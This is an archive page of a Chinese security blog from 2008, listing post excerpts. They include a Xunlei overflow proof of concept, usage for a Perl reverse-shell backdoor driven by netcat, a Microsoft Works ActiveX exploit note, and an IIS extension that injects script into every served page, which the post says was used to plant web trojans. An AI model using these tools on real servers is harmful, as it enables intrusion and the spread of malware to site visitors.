2008年5月 的日志

迅雷本地溢出POC

作者:疯狗
以前一直在传迅雷还有0day,Activex的应该差不多了,但是也不敢怠慢,还是卸载之,今天丰初发来一URL,原来素一迅雷0day,看说明还是远程!感觉装了一个,看那个漏洞监听的端口
C:\>netstat -na|find “36897”
TCP    127.0.0.1:36897        0.0.0.0:0              LISTENING

绑定的本地IP啊?!那就说明这个是不可以远程的,只能本地了。
……
23132CBE    68 B4C61323     push    2313C6B4                         ; ASCII “savepath”
23132CC3    57              push    edi
23132CC4    FFD6            call    esi
23132CC6    59              pop     ecx
23132CC7    84C0            test    al, al

阅读全文 »

Tags: ,

perl后门,正向和反向

作者:小杰

都是使用nc监听!
反向连接代码:

#!/usr/bin/perl
#usage:
#nc -vv -l -p PORT(default 1988) on your local system first,then
#Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988)
#Type 'exit' to exit or press Enter to gain shell when u under the 'console'.
#nc -vv -l -p 1988
#perl backdoor.pl 127.0.0.1 1988    
 阅读全文 »
Tags: ,

PHPWind官方被黑

Tags: ,

discuz官方被黑

Tags: ,

换用WP-PostViews,并找回以前的日志阅读数

刚才禁用了Popularity Contest插件,换用WP-PostViews,因为像Popularity Contest这种以百分比来显示文章受欢迎度的方式不适合我们国人的习惯,还是用WP-PostViews直接来显示文章的阅读次数比较舒服些。

不过当初转换数据的时候,没有考虑到会用WP-PostViews这个插件,因此当时没有把在LBS下的日志阅读数也给转过来,刚才启用WP-PostViews之后,又找到原来LBS的数据,把日志阅读数也转了过来,直接phpmyadmin下 update wp_postmeta set metavalue=’日志阅读数’ where meta_key=’views’ and post_id=’日志ID’; ,但是比较遗憾的是从转到wordpress以来,这些天的日志阅读数都损失了,没有跟原来LBS下的日志阅读数加到一起,刚开始没有想到这个问题,update完了之后才发现的,不过已经晚了。也只能这样了。

Tags: , ,

[BT下载]Windows XP with SP3 VOL MSDN 简体中文版

来源:cnbeta

感谢yaoyou12的投递
新闻来源:网中漫步
Windows XP Professional with Service Pack 3 (x86) – CD (Chinese-Simplified)
zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070.iso 601.04 MB
发布日期 (UTC):5/2/2008 12:05:18 AM
SHA1:d142469d0c3953d8e4a6a490a58052ef52837f0f
阅读全文 »

Tags: , , ,

Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit

<!–
The problem is in wkimgsrv.dll module shipped with many MS Offiice
Suite (tested on MS OF 2003,MS OF 2007)
Actually,this is not the case of buffer overflow attack,just a exploit
of insecure method WKsPictureInterface.
Setting this point to any where in memory and IE will crash when
wkiimgsrv’s trying to access an invalid memory location.
阅读全文 »

Tags: , , ,

IIS_AD IIS扩展源代码

来源:安全警戒线论坛

用于向网页中插入代码,支持iframe以及script 标签。

原本这程序是别人定做的,因为交易方式的分歧,闹的不惶而散。
看到群里有人不知道在那弄到的,当成宝贝是的,既然没交易,就发出来吧。
原本人家是用来挂广告的,让有心人用来挂马用了
原理很简单,就是在IIS应用程序池isapi,特点是解决了win2003假死问题,缩短IIS应用池回收时间。
测试环境WIN2003+IIS XPSP2+IIS    WIN2000没测试。
首先打开GetID.exe获取注册号,运行IIS_AD.exe生成DLL文件,加载到IIS应用池就OK了
有了他服务器任何的一个页面都会有广告代码或者网马代码。
之后修改IIS_AD.ini里的内容:
[IIS_AD]
ADjs=<script language='javascript'>alert('Welcome to User IIS AD !');</script>

支持iframe以及script 标签。

阅读全文 »

Tags: